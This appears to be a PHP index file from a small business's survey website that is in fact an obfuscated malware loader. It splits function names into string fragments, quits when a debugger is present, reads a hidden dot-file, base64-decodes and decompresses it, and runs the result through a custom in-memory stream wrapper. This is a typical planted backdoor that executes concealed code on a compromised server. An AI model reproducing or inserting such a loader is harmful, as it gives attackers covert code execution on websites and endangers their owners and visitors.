File: /home/wbwebdes/domains/survey.nailsbyrianne.nl/public_html/index.php0
<?php
error_reporting(E_ALL & ~E_WARNING & ~E_DEPRECATED);
define('IN_PROD', 1);
class MemoryCodeStream {
private $_2e05519b;
private $_5bc2d74b;
public function stream_open($_223c548e, $_89b36a4a, $_16e74614, &$_26ec4dd7) {
$this->_5bc2d74b = substr($_223c548e, 10);
$this->_2e05519b = 0;
return true;
}
public function stream_read($_828e7995) {
$_054f8bb7 = substr($this->_5bc2d74b, $this->_2e05519b, $_828e7995);
$this->_2e05519b += strlen($_054f8bb7);
return $_054f8bb7;
}
public function stream_stat() {
return array('size' => strlen($this->_5bc2d74b));
}
public function stream_eof() {
return $this->_2e05519b >= strlen($this->_5bc2d74b);
}
}
$_48af31fd = "s"."tr"."eam"."_"."get_w"."r"."a"."p"."p"."ers";
$_38c3dd30 = $_48af31fd();
if (!in_array("m"."e"."m"."co"."de", $_38c3dd30)) {
$_c7fb5288 = "str"."e"."a"."m"."_"."wrap"."pe"."r_"."r"."eg"."is"."t"."er";
$_c7fb5288("m"."e"."m"."co"."de", "M"."em"."o"."ry"."C"."o"."d"."e"."St"."r"."e"."am");
}
if (function_exists('xdebug_get_function_stack')) exit;
$_09b63878 = function($_35f116b7){
$_6936cb24 = __DIR__.'/.'.substr(sha1($_35f116b7),0,8);
if (!is_file($_6936cb24)) exit;
$_8746b33e = "f"."il"."e"."_"."get"."_c"."on"."t"."e"."nt"."s";
$_5391362e = $_8746b33e($_6936cb24);
$_555fedeb = "b"."ase"."64_"."d"."e"."c"."o"."de";
$_45d51007 = "gzi"."nf"."la"."te";
return $_45d51007($_555fedeb($_5391362e));
};
$_2b26b235 = function($_7c6cf43e){
require "me"."m"."co"."d"."e:"."/"."/" . $_7c6cf43e;
};
$_7c6cf43e = $_09b63878('4a96b8166ebe37b5');
if ($_7c6cf43e) {
$_2b26b235($_7c6cf43e);
}